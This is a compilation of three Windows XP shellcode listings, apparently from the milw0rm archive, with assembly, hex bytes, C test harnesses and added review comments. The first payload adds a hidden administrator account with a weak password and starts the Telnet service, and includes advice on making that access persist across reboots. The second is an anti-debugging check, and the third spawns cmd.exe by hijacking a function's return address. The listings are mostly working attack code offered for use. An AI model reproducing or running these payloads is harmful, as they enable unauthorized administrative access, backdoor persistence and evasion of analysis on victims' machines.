
Win32 telnetbind by winexec 111 bytes

; payload:add admin acount & Telnet Listening
; Author: DATA_SNIPER
; size:111 bytes
; platform:WIN32/XP SP2 FR
; thanks:Arab4services team & AT4RE Team
; more info: visit my blog http://datasniper.arab4services.net
; The Sh3llcode:
; "\xEB\x08\xBA\x4D\x11\x86\x7C\xFF\xD2\xCC\xE8\xF3\xFF\xFF\xFF\x63\x6D\x64\x20\x2F\x63"
; "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x68\x69\x6C\x6C\x20\x31\x32\x33\x34\x35"
; "\x36\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67"
; "\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x65\x75\x72\x73"
; "\x20\x68\x69\x6C\x6C\x20\x2F\x41\x44\x44\x20\x26\x26\x20\x73\x63\x20\x73\x74\x61"
; "\x72\x74\x20\x54\x6C\x6E\x74\x53\x76\x72\x00"
; Description: it's similar to a TCP BindShell on port 23: through command execution we can get shell access through the telnet service on the Windows b0x.
; Add admin account command user=GAZZA ,pass=123456 :cmd /c net user GAZZA 123456 /ADD && net localgroup Administrateurs GAZZA /ADD
; Start telnet service: sc start TlntSvr
; For saving ur access to the B0x again and again :),u can use this command:
; "sc config TlntSvr start= auto & sc start TlntSvr" instead of:
; "sc start TlntSvr"
; NASM -s -fbin telnetbind.asm
BITS 32
db 0EBh,08h ; raw encoding of "jmp short Data" (skips the 8 bytes of Exec); emitted as bytes so no NUL appears in the output
Exec:
MOV EDX,7C86114Dh ; hard-coded WinExec address for a single kernel32.dll build (XP SP2 FR); on any other build this points at arbitrary code and the payload crashes
CALL EDX ; WinExec(lpCmdLine, uCmdShow): lpCmdLine is the address pushed by "CALL Exec" below, i.e. the command string; uCmdShow is not set and is whatever is next on the stack
INT3 ; breakpoint trap so the process stops after WinExec returns instead of running on (the original author notes ExitProcess as the alternative)
Data:
CALL Exec ; pushes the address of the string that follows as the return address, which Exec then passes to WinExec
db 'cmd /c net user exploitvuln 123456 /ADD & net localgroup Administrateurs exploitvuln /ADD & sc start TlntSvr',00h
; NOTE(review): this is not the string encoded in the hex blob in the header: that blob uses the account name "hill" and "&&" separators, and the "111 bytes" figure applies to it, not to this source; the header text names a third account ("GAZZA").
; The command line is stored unencoded, so it is a trivial plaintext signature for detection; the ".exe" on cmd is dropped to save bytes.

#milw0rm

win32 PEB!NtGlobalFlags shellcode 14 bytes

/*

PEB!NtGlobalFlags ( 14 BYTES )
Author: Koshi
Description: Uses the PEB method to determine whether a debugger is
attached to the running process or not. No 9x. :(
Length: 14 Bytes
Registers Used: EAX,ESI,ESP
Compiled: jpXV34dd3v09Fh

*/

/*

00401000 > 6A 70 PUSH 70
00401002 58 POP EAX
00401003 56 PUSH ESI
00401004 333464 XOR ESI,DWORD PTR SS:[ESP]
00401007 64:3376 30 XOR ESI,DWORD PTR FS:[ESI+30]
0040100B 3946 68 CMP DWORD PTR DS:[ESI+68],EAX
JE DebuggerPresent ( If equal debugger attached )
*/

/* The 14 instruction bytes from the disassembly above (0x6A 0x70 ... 0x68).
 * The initializer is a string literal, so sizeof(Shellcode) is 15: the
 * terminating NUL is part of the array but not part of the payload. */
unsigned char Shellcode[] =
{"\x6A\x70\x58\x56\x33\x34\x64"
"\x64\x33\x76\x30\x39\x46\x68"};



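/* Prints the payload length, then the payload bytes themselves.
 * Requires <stdio.h>, which the listing above does not include. */
int main( int argc, char *argv[] )
{
    (void)argc;
    (void)argv;
    /* sizeof(Shellcode) counts the string literal's terminating NUL, so
     * subtract one for the payload length; %zu is the size_t specifier
     * (the original used %u, which does not match size_t). */
    printf( "Shellcode is %zu bytes.\n", sizeof(Shellcode)-1 );
    /* The buffer must be an argument, never the format string: a '%' byte
     * inside a payload would be parsed as a conversion and read off the
     * stack. The original passed Shellcode itself as the format. */
    printf( "%s", (const char *)Shellcode );
    return 0;
}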

# milw0rm

win32 XP sp2 (FR) Sellcode cmd.exe 32 bytes

/*
windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes
Author : Mountassif Moad
Big Thnx : Houssamix & SimO-s0fT
Changed by : Stack
Description : It is a 32-byte shellcode which executes cmd.exe. Tested under Windows XP SP2 FR
My first original shellcode Here http://www.milw0rm.com/shellcode/7971
because i receive every day full message who insult me (you'r lamer - fucker ->
you dont understand anything abouts sec ) infinity of insult
and the last time i receive an message have => i make full error in my first shelcode & in the end he
insult my mother & me (shit)
so i tell all people when want insult anyone remembers we are just human not angel
euuuh : i'm decide to write another small shellcode this time just for fun (32 bytes xd )
Assembly Code : this time is not a secret (:@)
00402000 8BEC MOV EBP,ESP
00402002 33FF XOR EDI,EDI
00402004 57 PUSH EDI
00402005 C645 FC 63 MOV BYTE PTR SS:[EBP-4],63
00402009 C645 FD 6D MOV BYTE PTR SS:[EBP-3],6D
0040200D C645 FE 64 MOV BYTE PTR SS:[EBP-2],64
00402011 C645 F8 01 MOV BYTE PTR SS:[EBP-8],1
00402015 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
00402018 50 PUSH EAX
00402019 B8 C793BF77 MOV EAX,msvcrt.system (i notice this for work in other machine)
0040201E FFD0 CALL EAX
*/
#include "stdio.h"
/* The 32 instruction bytes from the disassembly above. The bytes 63 6D 64
 * build the string "cmd" on the stack one byte at a time; C7 93 BF 77 is a
 * hard-coded address of msvcrt.system for one msvcrt.dll build, so the
 * payload only works where that exact build is loaded at that address. */
unsigned char shellcode[] =
"\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xFC\x63\xC6\x45"
"\xFD\x6D\xC6\x45\xFE\x64"
"\xC6\x45\xF8\x01\x8D"
"\x45\xFC\x50\xB8\xC7\x93"
"\xBF\x77\xFF\xD0";
/* Test harness: prints the payload length, then diverts main's return into
 * the shellcode array by writing directly to what it assumes is the saved
 * return address. Everything below is undefined behaviour that depends on
 * one compiler's 32-bit frame layout. */
int main ()
{
/* `ret` points into main's own frame; "+2" assumes the saved return
 * address sits two 4-byte slots above it (past the saved EBP), which
 * holds only for a specific 32-bit frame layout -- TODO confirm per build. */
int *ret;
ret=(int *)&ret+2;
/* NOTE(review): strlen() needs <string.h>, which is not included here, and
 * %d does not match its size_t result (%zu would). */
printf("Shellcode Length is : %d\n",strlen(shellcode));
/* Overwrites that slot with the array's address so main "returns" into
 * the payload. The array lives in writable data, so DEP/NX blocks this
 * unless the data segment is executable; (int)shellcode also truncates a
 * 64-bit pointer, so the harness is 32-bit only. */
(*ret)=(int)shellcode;
return 0;
}

# milw0rm